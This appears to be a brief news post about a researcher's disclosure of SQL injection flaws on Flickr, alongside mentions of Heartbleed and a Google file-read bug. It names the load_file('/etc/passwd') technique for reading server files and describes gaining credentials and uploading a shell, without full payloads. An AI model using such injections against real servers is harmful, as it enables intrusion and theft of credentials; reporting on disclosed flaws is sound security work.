











Now Security Researcher are on the fire mood, I think. Last week was one of the vulnerable week for the internet. As researcher have found Heartbleed vulnerability that puts almost three-fourth (3/4) of the worlds websites in a vulnerable side. After this Researcher form Detectify have found the critical vulnerability on the Google products that leads to read the 'etc/passwd' and 'etc/host' file of the Google Server.Now once again another biggest photo sharing site Flickr (owned by Yahoo.Inc) have suffered from sever vulnerability. A security researcher Ibrahim Raafat from Egypt have found the SQL injection vulnerability on the Flickr site. claims that he has found two parameters () vulnerable to Blind SQL injection and one () vulnerable to direct SQL injection. This vulnerable allow the attacker to read the Flickr database. Further more a successful SQL exploitation can allow attacker to gain database and MYSQL login credentials, by injecting the SQL query.Further more Researcher explains that, SQL injection vulnerability on Flickr allows the attacker to produce its attack to Remote Code Execution on the server and using load_file(“/etc/passwd“) function he was successfully managed to read the content from the sensitive files on the Flickr server, as shown below:Raafat have also shows the Video demonstration that the vulnerability allows to write new files on the server that let him upload a custom 'code execution shell'.